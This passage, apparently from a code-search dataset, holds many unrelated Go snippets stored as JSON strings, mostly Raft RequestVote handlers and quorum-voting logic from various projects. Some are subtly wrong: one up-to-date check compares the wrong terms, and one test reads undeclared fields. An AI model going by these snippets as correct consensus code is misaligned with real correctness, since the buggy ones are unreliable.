up-to-date. If the logs end with the same term,\n\tthen whichever log is longer is more up-to-date.\n\t */\n\tif args.Term < rf.currentTerm {\n\t\treturn false\n\t}\n\tif args.LastLogTerm < rf.currentTerm {\n\t\treturn false\n\t}\n\tif args.LastLogIndex < len(rf.log) - 1 {\n\t\treturn false\n\t}\n\treturn true\n}", "func TestCannotTransferLeaseToVoterOutgoing(t *testing.T) {\n\tdefer leaktest.AfterTest(t)()\n\tdefer log.Scope(t).Close(t)\n\tctx := context.Background()\n\n\tknobs, ltk := makeReplicationTestKnobs()\n\t// Add a testing knob to allow us to block the change replicas command\n\t// while it is being proposed. When we detect that the change replicas\n\t// command to move n3 to VOTER_OUTGOING has been evaluated, we'll send\n\t// the request to transfer the lease to n3. The hope is that it will\n\t// get past the sanity above latch acquisition prior to change replicas\n\t// command committing.\n\tvar scratchRangeID atomic.Value\n\tscratchRangeID.Store(roachpb.RangeID(0))\n\tchangeReplicasChan := make(chan chan struct{}, 1)\n\tshouldBlock := func(args kvserverbase.ProposalFilterArgs) bool {\n\t\t// Block if a ChangeReplicas command is removing a node from our range.\n\t\treturn args.Req.RangeID == scratchRangeID.Load().(roachpb.RangeID) &&\n\t\t\targs.Cmd.ReplicatedEvalResult.ChangeReplicas != nil &&\n\t\t\tlen(args.Cmd.ReplicatedEvalResult.ChangeReplicas.Removed()) > 0\n\t}\n\tblockIfShould := func(args kvserverbase.ProposalFilterArgs) {\n\t\tif shouldBlock(args) {\n\t\t\tch := make(chan struct{})\n\t\t\tchangeReplicasChan <- ch\n\t\t\t<-ch\n\t\t}\n\t}\n\tknobs.Store.(*kvserver.StoreTestingKnobs).TestingProposalFilter = func(args kvserverbase.ProposalFilterArgs) *roachpb.Error {\n\t\tblockIfShould(args)\n\t\treturn nil\n\t}\n\ttc := testcluster.StartTestCluster(t, 4, base.TestClusterArgs{\n\t\tServerArgs: base.TestServerArgs{Knobs: knobs},\n\t\tReplicationMode: base.ReplicationManual,\n\t})\n\tdefer tc.Stopper().Stop(ctx)\n\n\tscratchStartKey := tc.ScratchRange(t)\n\tdesc := tc.AddVotersOrFatal(t, scratchStartKey, tc.Targets(1, 2)...)\n\tscratchRangeID.Store(desc.RangeID)\n\t// Make sure n1 has the lease to start with.\n\terr := tc.Server(0).DB().AdminTransferLease(context.Background(),\n\t\tscratchStartKey, tc.Target(0).StoreID)\n\trequire.NoError(t, err)\n\n\t// The test proceeds as follows:\n\t//\n\t// - Send an AdminChangeReplicasRequest to remove n3 and add n4\n\t// - Block the step that moves n3 to VOTER_OUTGOING on changeReplicasChan\n\t// - Send an AdminLeaseTransfer to make n3 the leaseholder\n\t// - Try really hard to make sure that the lease transfer at least gets to\n\t// latch acquisition before unblocking the ChangeReplicas.\n\t// - Unblock the ChangeReplicas.\n\t// - Make sure the lease transfer fails.\n\n\tltk.withStopAfterJointConfig(func() {\n\t\tvar wg sync.WaitGroup\n\t\twg.Add(1)\n\t\tgo func() {\n\t\t\tdefer wg.Done()\n\t\t\t_, err = tc.Server(0).DB().AdminChangeReplicas(ctx,\n\t\t\t\tscratchStartKey, desc, []roachpb.ReplicationChange{\n\t\t\t\t\t{ChangeType: roachpb.REMOVE_VOTER, Target: tc.Target(2)},\n\t\t\t\t\t{ChangeType: roachpb.ADD_VOTER, Target: tc.Target(3)},\n\t\t\t\t})\n\t\t\trequire.NoError(t, err)\n\t\t}()\n\t\tch := <-changeReplicasChan\n\t\twg.Add(1)\n\t\tgo func() {\n\t\t\tdefer wg.Done()\n\t\t\terr := tc.Server(0).DB().AdminTransferLease(context.Background(),\n\t\t\t\tscratchStartKey, tc.Target(2).StoreID)\n\t\t\trequire.Error(t, err)\n\t\t\trequire.Regexp(t,\n\t\t\t\t// The error generated during evaluation.\n\t\t\t\t\"replica cannot hold lease|\"+\n\t\t\t\t\t// If the lease transfer request has not yet made it to the latching\n\t\t\t\t\t// phase by the time we close(ch) below, we can receive the following\n\t\t\t\t\t// error due to the sanity checking which happens in\n\t\t\t\t\t// AdminTransferLease before attempting to evaluate the lease\n\t\t\t\t\t// transfer.\n\t\t\t\t\t// We have a sleep loop below to try to encourage the lease transfer\n\t\t\t\t\t// to make it past that sanity check prior to letting the change\n\t\t\t\t\t// of replicas proceed.\n\t\t\t\t\t\"cannot transfer lease to replica of type VOTER_DEMOTING_LEARNER\", err.Error())\n\t\t}()\n\t\t// Try really hard to make sure that our request makes it past the\n\t\t// sanity check error to the evaluation error.\n\t\tfor i := 0; i < 100; i++ {\n\t\t\truntime.Gosched()\n\t\t\ttime.Sleep(time.Microsecond)\n\t\t}\n\t\tclose(ch)\n\t\twg.Wait()\n\t})\n\n}", "func (r *RaftNode) Vote(rv RequestVoteStruct, response *RPCResponse) error {\n\tr.Lock()\n\tdefer r.Unlock()\n\tif r.verbose {\n\t\tlog.Println(\"Vote()\")\n\t}\n\n\tdefer r.persistState()\n\n\tresponse.Term = r.CurrentTerm\n\n\tmyLastLogTerm := r.getLastLogTerm()\n\tmyLastLogIdx := r.getLastLogIndex()\n\n\tif r.verbose {\n\t\tlog.Printf(\"RequestVoteStruct: %s. \\nMy node: term: %d, votedFor %d, lastLogTerm: %d, lastLogIdx: %d\",\n\t\t\trv.String(), r.CurrentTerm, r.VotedFor, myLastLogTerm, myLastLogIdx)\n\t}\n\n\tlooksEligible := r.CandidateLooksEligible(rv.LastLogIdx, rv.LastLogTerm)\n\n\tif rv.Term > r.CurrentTerm {\n\t\tr.shiftToFollower(rv.Term, HostID(-1)) // We do not yet know who is leader for this term\n\t}\n\n\tif rv.Term < r.CurrentTerm {\n\t\tif r.verbose {\n\t\t\tlog.Println(\"RV from prior term - do not grant vote\")\n\t\t}\n\t\tresponse.Success = false\n\t} else if (r.VotedFor == -1 || r.VotedFor == rv.CandidateID) && looksEligible {\n\t\tif r.verbose {\n\t\t\tlog.Println(\"Grant vote\")\n\t\t}\n\t\tr.resetTickers()\n\t\tresponse.Success = true\n\t\tr.VotedFor = rv.CandidateID\n\t} else {\n\t\tif r.verbose {\n\t\t\tlog.Println(\"Do not grant vote\")\n\t\t}\n\t\tresponse.Success = false\n\t}\n\n\treturn nil\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\n\t//defer rf.updateAppliedLock()\n\t//Your code here (2A, 2B).\n\tisALeader := rf.role == Leader\n\n\tif rf.updateTermLock(args.Term) && isALeader {\n\t\t//DPrintf(\"[DEBUG] Server %d from %d to Follower {requestVote : Term higher}\", rf.me, Leader)\n\t}\n\treply.VoteCranted = false\n\tvar votedFor interface{}\n\t//var isLeader bool\n\tvar candidateID, currentTerm, candidateTerm, currentLastLogIndex, candidateLastLogIndex, currentLastLogTerm, candidateLastLogTerm int\n\n\tcandidateID = args.CandidateID\n\tcandidateTerm = args.Term\n\tcandidateLastLogIndex = args.LastLogIndex\n\tcandidateLastLogTerm = args.LastLogTerm\n\n\trf.mu.Lock()\n\n\treply.Term = rf.currentTerm\n\tcurrentTerm = rf.currentTerm\n\tcurrentLastLogIndex = len(rf.logs) - 1 //TODO: fix the length corner case\n\tcurrentLastLogTerm = rf.logs[len(rf.logs)-1].Term\n\tvotedFor = rf.votedFor\n\tisFollower := rf.role == Follower\n\trf.mu.Unlock()\n\t//case 0 => I'm leader, so you must stop election\n\tif !isFollower {\n\t\tDPrintf(\"[DEBUG] Case0 I [%d] is Candidate than %d\", rf.me, args.CandidateID)\n\t\treturn\n\t}\n\n\t//case 1 => the candidate is not suit to be voted\n\tif currentTerm > candidateTerm {\n\t\tDPrintf(\"[DEBUG] Case1 Follower %d > Candidate %d \", rf.me, args.CandidateID)\n\t\treturn\n\t}\n\n\t//case 2 => the candidate's log is not lastest than the follwer\n\tif currentLastLogTerm > candidateLastLogTerm || (currentLastLogTerm == candidateLastLogTerm && currentLastLogIndex > candidateLastLogIndex) {\n\t\tDPrintf(\"[DEBUG] Case2 don't my[%d] newer than can[%d]\", rf.me, args.CandidateID)\n\t\treturn\n\t}\n\trf.mu.Lock()\n\t//case3 => I have voted and is not you\n\tif votedFor != nil && votedFor != candidateID {\n\t\trf.mu.Unlock()\n\t\treturn\n\t}\n\n\t//now I will vote you\n\n\tvar notFollower bool\n\trf.votedFor = candidateID\n\tif rf.role != Follower {\n\t\tnotFollower = true\n\t}\n\tDPrintf(\"[Vote] Server[%d] vote to Can[%d]\", rf.me, args.CandidateID)\n\trf.role = Follower\n\treply.VoteCranted = true\n\trf.mu.Unlock()\n\trf.persist()\n\tif notFollower {\n\t\trf.msgChan <- RecivedVoteRequest\n\t} else {\n\t\trf.msgChan <- RecivedVoteRequest\n\t}\n\n\treturn\n}", "func TestMsgVote(t *testing.T) {\n\ttests := []struct {\n\t\tsigners []sdk.AccAddress\n\t}{\n\t\t{addrs},\n\t\t{[]sdk.AccAddress{addrs[0]}},\n\t}\n\n\tfor i, tc := range tests {\n\t\tmsg := NewMsgVote(tc.voterAddr, tc.proposalID, tc.option)\n\t\tif tc.expectPass {\n\t\t\trequire.Nil(t, msg.ValidateBasic(), \"test: %v\", i)\n\t\t} else {\n\t\t\trequire.NotNil(t, msg.ValidateBasic(), \"test: %v\", i)\n\t\t}\n\t}\n}", "func (_Contracts *ContractsTransactorSession) VerifyVoter(_proposal *big.Int, _positionId *big.Int, _voterId *big.Int, _voterAddr common.Address) (*types.Transaction, error) {\n\treturn _Contracts.Contract.VerifyVoter(&_Contracts.TransactOpts, _proposal, _positionId, _voterId, _voterAddr)\n}", "func (t *subtransaction) updateVoterState(voter *Voter, vote *voting.Vote) error {\n\tswitch voter.result {\n\tcase VoteUndecided:\n\t\t// Happy case, we can still cast a vote.\n\t\tbreak\n\tcase VoteCanceled:\n\t\treturn ErrTransactionCanceled\n\tcase VoteStopped:\n\t\treturn ErrTransactionStopped\n\tcase VoteCommitted:\n\t\treturn fmt.Errorf(\"cannot change committed vote\")\n\tdefault:\n\t\t// Because we didn't vote yet, we know that the node cannot be\n\t\t// either in VoteCommitted or VoteFailed state.\n\t\treturn fmt.Errorf(\"voter is in invalid state %d\", voter.result)\n\t}\n\n\tswitch {\n\tcase vote != nil:\n\t\tif voter.vote != nil {\n\t\t\treturn errors.New(\"changing current vote is not allowed\")\n\t\t}\n\n\t\tt.voteCounts[*vote] += voter.Votes\n\t\tvoter.vote = vote\n\tcase vote == nil:\n\t\tif t.isDone() {\n\t\t\t// If the transaction is already done, it's too late to cancel our vote.\n\t\t\t// Other nodes may have committed their changes already.\n\t\t\treturn errors.New(\"subtransaction was already finished\")\n\t\t}\n\n\t\t// Remove the voter's support for the vote so it's not counted towards the\n\t\t// majority. The node is not going to commit the subtransaction anyway.\n\t\tt.voteCounts[*voter.vote] -= voter.Votes\n\t\tvoter.result = VoteCanceled\n\t}\n\n\tdefer func() {\n\t\tif t.mustSignalVoters() {\n\t\t\tclose(t.doneCh)\n\t\t}\n\t}()\n\n\tvar majorityVote *voting.Vote\n\tvar majorityVoteCount uint\n\tfor v, voteCount := range t.voteCounts {\n\t\tif majorityVoteCount < voteCount {\n\t\t\tv := v\n\t\t\tmajorityVoteCount = voteCount\n\t\t\tmajorityVote = &v\n\t\t}\n\t}\n\n\tvar outstandingVotes uint\n\tfor _, voter := range t.votersByNode {\n\t\tif voter.vote == nil {\n\t\t\toutstandingVotes += voter.Votes\n\t\t}\n\t}\n\n\t// When the majority vote didn't yet cross the threshold and the number of outstanding votes\n\t// may still get us across that threshold, then we need to wait for more votes to come in.\n\tif majorityVoteCount < t.threshold && majorityVoteCount+outstandingVotes >= t.threshold {\n\t\treturn nil\n\t}\n\n\t// Update all voters which have cast a vote and which are not undecided. We mustn't change\n\t// any voters which did decide on an outcome already as they may have already committed or\n\t// aborted their action.\n\tfor _, voter := range t.votersByNode {\n\t\t// We cannot change the mind of nodes which have already settled on any outcome\n\t\t// after the fact.\n\t\tif voter.result != VoteUndecided {\n\t\t\tcontinue\n\t\t}\n\n\t\t// We do not change the mind of any voter which didn't yet cast its vote. While it\n\t\t// may be true that it can only fail anyway, it is easier to handle if we just wait\n\t\t// for its incoming vote and set it to failed at that point in time.\n\t\tif voter.vote == nil {\n\t\t\tcontinue\n\t\t}\n\n\t\t// If the majority vote count is smaller than the threshold at this point, then we\n\t\t// know that we cannot ever reach it anymore even with the votes which are still\n\t\t// outstanding. We can thus mark this node as failed.\n\t\tif majorityVoteCount < t.threshold {\n\t\t\tvoter.result = VoteFailed\n\t\t\tcontinue\n\t\t}\n\n\t\t// Otherwise, the result depends on whether the voter agrees on the quorum or not.\n\t\tif *voter.vote == *majorityVote {\n\t\t\tvoter.result = VoteCommitted\n\t\t} else {\n\t\t\tvoter.result = VoteFailed\n\t\t}\n\t}\n\n\treturn nil\n}", "func (a *RPC) VoteForLeader(args *RequestVoteRPCArgs,reply *bool) error{\n\t//r.ResetTimer()\n \t//fmt.Println(\"received Vote request parameter \",(*args).CandidateId,\" \",(*args).Term,\" \",(*args).LastLogTerm,\" \",(*args).LastLogIndex)\n \t//if len(r.Log)>1{\n \t//\tfmt.Println(\"Vote Request folloer parameter \",r.Id,\" \", r.CurrentTerm,\" \",r.Log[len(r.Log)-1].Term ,\" \",len(r.Log)-1)\n \t//}\n\tif r.IsLeader==2 { // if this server is follower\n\t\t//r.ResetTimer() //TODO\n\t\tif r.CurrentTerm > args.Term || r.VotedFor >-1 { // if follower has updated Term or already voted for other candidate in same term , reply nagative\n\t\t\t*reply = false\n\t\t} else if r.VotedFor== -1{ // if follower has not voted for anyone in current Term \n\t\t\tlastIndex:= len(r.Log) \n\t\t\tif lastIndex > 0 && args.LastLogIndex >0{ // if Candiate log and this server log is not empty. \n\t\t\t\tif r.Log[lastIndex-1].Term > args.LastLogTerm { // and Term of last log in follower is updated than Candidate, reject vote\n *reply=false\n }else if r.Log[lastIndex-1].Term == args.LastLogTerm{ // else if Terms of Follower and candidate is same\n \tif (lastIndex-1) >args.LastLogIndex { // but follower log is more updated, reject vote\n \t\t*reply = false\n \t} else {\n \t\t\t*reply = true // If last log terms is match and followe log is sync with candiate, vote for candidate\n \t\t}\n }else{ // if last log term is not updated and Term does not match, \n \t \t\t*reply=true//means follower is lagging behind candiate in log entries, vote for candidate\n \t\t}\n \t\n\t\t\t} else if lastIndex >args.LastLogIndex { // either of them is Zero\n\t\t\t\t*reply = false // if Follower has entries in Log, its more updated, reject vote\n\t\t\t}else{\n\t\t\t\t\t*reply = true // else Vote for candiate\n\t\t\t\t}\n\t\t}else{\n\t\t\t*reply=false\n\t\t}\n\t}else{\n\t\t*reply = false // This server is already a leader or candiate, reject vote\n\t}\n\n\tif(*reply) {\n r.VotedFor=args.CandidateId // Set Voted for to candiate Id if this server has voted positive\n }\n\t/*if(*reply) {\n\t\tfmt.Println(\"Follower \",r.Id,\" Voted for \",r.VotedFor)\n\t}else{\n\t\tfmt.Println(\"Follower \",r.Id,\" rejected vote for \",args.CandidateId)\n\t}*/\n\treturn nil\n}", "func (vc *txElector) vote(lastHash []byte, tx *types.Tx) (queue, broadcast, hashMismatch bool) {\n\n\ttxkey := hex.EncodeToString(tx.Hash())\n\n\tvc.mu.Lock()\n\tdefer vc.mu.Unlock()\n\n\tv, ok := vc.m[txkey]\n\tif !ok {\n\t\tif !utils.EqualBytes(lastHash, tx.Header.PrevHash) {\n\t\t\thashMismatch = true\n\t\t\treturn\n\t\t}\n\n\t\tvc.m[txkey] = &orphanTx{tx: tx, lastSeen: time.Now().Unix(), votes: 1}\n\t\tbroadcast = true\n\t\treturn\n\t}\n\n\tv.votes++\n\tv.lastSeen = time.Now().Unix()\n\tvc.m[txkey] = v\n\n\tif v.votes == vc.quorum {\n\t\tqueue = true\n\t\treturn\n\t}\n\n\treturn\n}", "func (vm *VotingMachine) OnVote(vote hotstuff.VoteMsg) {\n\tdefer func() {\n\t\t// delete any pending QCs with lower height than bLeaf\n\t\tfor k := range vm.verifiedVotes {\n\t\t\tif block, ok := vm.mod.BlockChain().LocalGet(k); ok {\n\t\t\t\tif block.View() <= vm.mod.ViewSynchronizer().LeafBlock().View() {\n\t\t\t\t\tdelete(vm.verifiedVotes, k)\n\t\t\t\t}\n\t\t\t} else {\n\t\t\t\tdelete(vm.verifiedVotes, k)\n\t\t\t}\n\t\t}\n\t}()\n\n\tcert := vote.PartialCert\n\tvm.mod.Logger().Debugf(\"OnVote(%d): %.8s\", vote.ID, cert.BlockHash())\n\n\tvar (\n\t\tblock *hotstuff.Block\n\t\tok bool\n\t)\n\n\tif !vote.Deferred {\n\t\t// first, try to get the block from the local cache\n\t\tblock, ok = vm.mod.BlockChain().LocalGet(cert.BlockHash())\n\t\tif !ok {\n\t\t\t// if that does not work, we will try to handle this event later.\n\t\t\t// hopefully, the block has arrived by then.\n\t\t\tvm.mod.Logger().Debugf(\"Local cache miss for block: %.8s\", cert.BlockHash())\n\t\t\tvote.Deferred = true\n\t\t\tvm.mod.EventLoop().AwaitEvent(hotstuff.ProposeMsg{}, vote)\n\t\t\treturn\n\t\t}\n\t} else {\n\t\t// if the block has not arrived at this point we will try to fetch it.\n\t\tblock, ok = vm.mod.BlockChain().Get(cert.BlockHash())\n\t\tif !ok {\n\t\t\tvm.mod.Logger().Debugf(\"Could not find block for vote: %.8s.\", cert.BlockHash())\n\t\t\treturn\n\t\t}\n\t}\n\n\tif block.View() <= vm.mod.ViewSynchronizer().LeafBlock().View() {\n\t\t// too old\n\t\treturn\n\t}\n\n\tif !vm.mod.Crypto().VerifyPartialCert(cert) {\n\t\tvm.mod.Logger().Info(\"OnVote: Vote could not be verified!\")\n\t\treturn\n\t}\n\n\tvotes := vm.verifiedVotes[cert.BlockHash()]\n\tvotes = append(votes, cert)\n\tvm.verifiedVotes[cert.BlockHash()] = votes\n\n\tif len(votes) < vm.mod.Config().QuorumSize() {\n\t\treturn\n\t}\n\n\tqc, err := vm.mod.Crypto().CreateQuorumCert(block, votes)\n\tif err != nil {\n\t\tvm.mod.Logger().Info(\"OnVote: could not create QC for block: \", err)\n\t\treturn\n\t}\n\tdelete(vm.verifiedVotes, cert.BlockHash())\n\n\t// signal the synchronizer\n\tvm.mod.ViewSynchronizer().AdvanceView(hotstuff.NewSyncInfo().WithQC(qc))\n}", "func (_Contracts *ContractsSession) VerifyVoter(_proposal *big.Int, _positionId *big.Int, _voterId *big.Int, _voterAddr common.Address) (*types.Transaction, error) {\n\treturn _Contracts.Contract.VerifyVoter(&_Contracts.TransactOpts, _proposal, _positionId, _voterId, _voterAddr)\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tlastLogIndex, lastLogTerm := len(rf.log) + rf.compactIndex , 0\n\tif lastLogIndex > rf.compactIndex {\n\t\tlastLogTerm = rf.log[lastLogIndex - rf.compactIndex -1].Term\n\t} else if lastLogIndex == rf.compactIndex {\n\t\tlastLogTerm = rf.compactTerm\n\t}\n\n\tif args.Term < rf.currentTerm || (args.Term == rf.currentTerm && args.CandidateID != rf.votedFor) || args.LastLogTerm < lastLogTerm || (args.LastLogTerm == lastLogTerm && lastLogIndex > args.LastLogIndex) {\n\t\t// 1. The Term of RequestVote is out of date.\n\t\t// 2. The instance vote for other peer in this term.\n\t\t// 3. The log of Candidate is not the most update.\n\t\treply.VoteGranted = false\n\t\treply.Term = rf.currentTerm\n\t} else {\n\t\t// DPrintf(\"instance %d vote for %d, Term is %d, lastLogTerm is %d, args.LastLogTerm is %d, lastLogIndex is %d, args.LastLogIndex is %d, original votedFor is %d\", rf.me, args.CandidateID, args.Term, lastLogTerm, args.LastLogTerm, lastLogIndex, args.LastLogIndex, rf.votedFor)\n\t\trf.votedFor = args.CandidateID\n\t\trf.currentTerm = args.Term\n\n\t\treply.VoteGranted = true\n\t\treply.Term = rf.currentTerm\n\n\t\tif rf.role == Follower {\n\t\t\trf.validRpcTimestamp = time.Now()\n\t\t} else {\n\t\t\t// Notify the change of the role of instance.\n\t\t\tclose(rf.rollback)\n\t\t\trf.role = Follower\n\t\t}\n\t}\n\n\treturn\n}", "func (v *verifyFuture) vote(leader bool) {\n\tv.voteLock.Lock()\n\tdefer v.voteLock.Unlock()\n\n\t// Guard against having notified already\n\tif v.notifyCh == nil {\n\t\treturn\n\t}\n\n\tif leader {\n\t\tv.votes++\n\t\tif v.votes >= v.quorumSize {\n\t\t\tv.notifyCh <- v\n\t\t\tv.notifyCh = nil\n\t\t}\n\t} else {\n\t\tv.notifyCh <- v\n\t\tv.notifyCh = nil\n\t}\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here (2A, 2B).\n\trf.executeLock.Lock()\n\tdefer rf.executeLock.Unlock()\n\n\t//DPrintf(\"[ReceiveRequestVote] [me %v] from [peer %v] start\", rf.me, args.CandidateId)\n\trf.stateLock.Lock()\n\n\tdebugVoteArgs := &RequestVoteArgs{\n\t\tTerm: rf.currentTerm,\n\t\tCandidateId: rf.votedFor,\n\t\tLastLogIndex: int32(len(rf.log) - 1),\n\t\tLastLogTerm: rf.log[len(rf.log)-1].Term,\n\t}\n\tDPrintf(\"[ReceiveRequestVote] [me %#v] self info: %#v from [peer %#v] start\", rf.me, debugVoteArgs, args)\n\treply.Term = rf.currentTerm\n\treply.VoteGranted = false\n\treply.LastLog = int32(len(rf.log) - 1)\n\treply.LastLogTerm = rf.log[reply.LastLog].Term\n\tif args.Term < rf.currentTerm {\n\t\tDPrintf(\"[ReceiveRequestVote] [me %v] from %v Term :%v <= currentTerm: %v, return\", rf.me, args.CandidateId, args.Term, rf.currentTerm)\n\t\trf.stateLock.Unlock()\n\t\treturn\n\t}\n\n\tconvrt2Follower := false\n\tif args.Term > rf.currentTerm {\n\t\trf.currentTerm = args.Term\n\t\trf.votedFor = -1\n\t\tconvrt2Follower = true\n\t\trf.persist()\n\t}\n\n\tif rf.votedFor == -1 || rf.votedFor == args.CandidateId {\n\t\tlastLogIndex := int32(len(rf.log) - 1)\n\t\tlastLogTerm := rf.log[lastLogIndex].Term\n\n\t\tif args.LastLogTerm < lastLogTerm || (args.LastLogTerm == lastLogTerm && args.LastLogIndex < lastLogIndex) {\n\t\t\trf.votedFor = -1\n\t\t\trf.lastHeartbeat = time.Now()\n\t\t\tDPrintf(\"[ReceiveRequestVote] [me %v] index from [%v] is oldest, return\", rf.me, args.CandidateId)\n\n\t\t\tif convrt2Follower && rf.role != _Follower {\n\t\t\t\tDPrintf(\"[ReceiveRequestVote] [me %v] from %v Term :%v (non-follower) > currentTerm: %v, return\", rf.me, args.CandidateId, args.Term, rf.currentTerm)\n\t\t\t\trf.role = _Unknown\n\t\t\t\trf.stateLock.Unlock()\n\t\t\t\tselect {\n\t\t\t\tcase <-rf.closeCh:\n\t\t\t\tcase rf.roleCh <- _Follower:\n\t\t\t\t}\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\trf.stateLock.Unlock()\n\t\t\treturn\n\t\t}\n\n\t\trf.votedFor = args.CandidateId\n\t\t// [WARNING] 一旦授权,应该重置超时\n\t\trf.lastHeartbeat = time.Now()\n\t\treply.VoteGranted = true\n\t\tDPrintf(\"[ReceiveRequestVote] [me %v] granted vote for %v\", rf.me, args.CandidateId)\n\t\tif rf.role != _Follower {\n\t\t\tDPrintf(\"[ReceiveRequestVote] [me %v] become follower\", rf.me)\n\t\t\trf.role = _Unknown\n\t\t\trf.stateLock.Unlock()\n\t\t\tselect {\n\t\t\tcase <-rf.closeCh:\n\t\t\t\treturn\n\t\t\tcase rf.roleCh <- _Follower:\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\trf.stateLock.Unlock()\n\t\treturn\n\t}\n\tDPrintf(\"[ReceiveRequestVote] [me %v] have voted: %v, return\", rf.me, rf.votedFor)\n\trf.stateLock.Unlock()\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n fmt.Printf(\"\\n -> I the Peer %d in got Vote Request from cadidate %d!\\n\",rf.me, args.CandidateId)\n \n rf.mu.Lock()\n defer rf.mu.Unlock() // TODO: ask professor/TA about this atomisitc and if mutex is needed.\n \n reply.FollowerTerm = rf.currentTerm\n \n rf.CheckTerm(args.CandidateTerm) \n \n // 2B code - fix if needed\n logUpToDate := false\n if len(rf.log) == 0 {\n logUpToDate = true\n } else if rf.log[len(rf.log)-1].Term < args.LastLogTerm {\n logUpToDate = true\n } else if rf.log[len(rf.log)-1].Term == args.LastLogTerm && \n len(rf.log) <= (args.LastLogIndex+1) {\n logUpToDate = true\n }\n // 2B code end\n \n reply.VoteGranted = (rf.currentTerm <= args.CandidateTerm && \n (rf.votedFor == -1 || rf.votedFor == args.CandidateId) &&\n logUpToDate) \n\n if reply.VoteGranted {\n rf.votedFor = args.CandidateId\n fmt.Printf(\"-> I the Peer %d say: Vote for cadidate %d Granted!\\n\",rf.me, args.CandidateId)\n } else {\n fmt.Printf(\"-> I the Peer %d say: Vote for cadidate %d Denied :/\\n\",rf.me, args.CandidateId)\n }\n}", "func testNonleaderStartElection(t *testing.T, state StateType) {\n\t// election timeout\n\tet := 10\n\tr := newTestRaft(1, []uint64{1, 2, 3}, et, 1, NewMemoryStorage())\n\tdefer closeAndFreeRaft(r)\n\tswitch state {\n\tcase StateFollower:\n\t\tr.becomeFollower(1, 2)\n\tcase StateCandidate:\n\t\tr.becomeCandidate()\n\t}\n\n\tfor i := 1; i < 2*et; i++ {\n\t\tr.tick()\n\t}\n\n\tif r.Term != 2 {\n\t\tt.Errorf(\"term = %d, want 2\", r.Term)\n\t}\n\tif r.state != StateCandidate {\n\t\tt.Errorf(\"state = %s, want %s\", r.state, StateCandidate)\n\t}\n\tif !r.votes[r.id] {\n\t\tt.Errorf(\"vote for self = false, want true\")\n\t}\n\tmsgs := r.readMessages()\n\tsort.Sort(messageSlice(msgs))\n\twmsgs := []pb.Message{\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 2, ToGroup: pb.Group{NodeId: 2, GroupId: 1, RaftReplicaId: 2},\n\t\t\tTerm: 2, Type: pb.MsgVote},\n\t\t{From: 1, FromGroup: pb.Group{NodeId: 1, GroupId: 1, RaftReplicaId: 1},\n\t\t\tTo: 3, ToGroup: pb.Group{NodeId: 3, GroupId: 1, RaftReplicaId: 3},\n\t\t\tTerm: 2, Type: pb.MsgVote},\n\t}\n\tif !reflect.DeepEqual(msgs, wmsgs) {\n\t\tt.Errorf(\"msgs = %v, want %v\", msgs, wmsgs)\n\t}\n}", "func (rf *Raft) isCandidateMoreUTD(args *RequestVoteArgs) bool {\n\tlastIndex := rf.absoluteLength() - 1\n\tif args.CLastLogTerm > rf.findLogTermByAbsoluteIndex(lastIndex) {\n\t\treturn true\n\t}\n\tif args.CLastLogTerm == rf.findLogTermByAbsoluteIndex(lastIndex) {\n\t\tif args.CLastLogIndex >= lastIndex {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}", "func (rf *Raft) RequestVote(args *RequestVoteArgs, reply *RequestVoteReply) {\n DPrintf(\"%d: %d recieve RequestVote from %d:%d\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate)\n // Your code here (2A, 2B).\n rf.mu.Lock()\n defer rf.mu.Unlock()\n if args.Term < rf.currentTerm {\n \n reply.VoteGranted = false\n reply.Term = rf.currentTerm\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n return\n }\n\n if args.Term > rf.currentTerm {\n rf.votedFor = -1\n rf.currentTerm = args.Term\n }\n\n if rf.votedFor == -1 || rf.votedFor == args.Candidate {\n // election restriction\n if args.LastLogTerm < rf.log[len(rf.log) - 1].Term ||\n (args.LastLogTerm == rf.log[len(rf.log) - 1].Term &&\n args.LastLogIndex < len(rf.log) - 1) {\n rf.votedFor = -1\n reply.VoteGranted = false\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n return\n }\n\n \n if rf.state == FOLLOWER {\n rf.heartbeat <- true\n }\n rf.state = FOLLOWER\n rf.resetTimeout()\n rf.votedFor = args.Candidate\n\n \n reply.VoteGranted = true\n reply.Term = args.Term\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n return\n }\n reply.VoteGranted = false\n reply.Term = args.Term\n DPrintf(\"%d: %d recieve voteRequest from %d:%d %v\\n\", rf.currentTerm, rf.me, args.Term, args.Candidate, reply.VoteGranted)\n}", "func (rf *Raft) RequestVote(args RequestVoteArgs, reply *RequestVoteReply) {\n\t// Your code here.\n\trf.mu.Lock()\n\tdefer rf.mu.Unlock()\n\n\tmay_grant_vote := true\n\tif len(rf.logs) > 0 {\n\t\t// rf.logs_term[len(rf.logs)-1] will always there, no matter snapshotedCount\n\t\tif rf.logs_term[len(rf.logs)-1] > args.LastLogTerm ||\n\t\t\t(rf.logs_term[len(rf.logs)-1] == args.LastLogTerm && len(rf.logs) > args.LogCount) {\n\t\t\tmay_grant_vote = false\n\t\t}\n\t}\n\trf.logger.Printf(\"Got vote request: %v, may grant vote: %v\\n\", args, may_grant_vote)\n\n\tif args.Term < rf.currentTerm {\n\t\trf.logger.Printf(\"Got vote request with term = %v, reject\\n\", args.Term)\n\t\treply.Term = rf.currentTerm\n\t\treply.Granted = false\n\t\treturn\n\t}\n\n\tif args.Term == rf.currentTerm {\n\t\trf.logger.Printf(\"Got vote request with current term, now voted for %v\\n\", rf.votedFor)\n\t\tif rf.votedFor == -1 && may_grant_vote {\n\t\t\trf.votedFor = 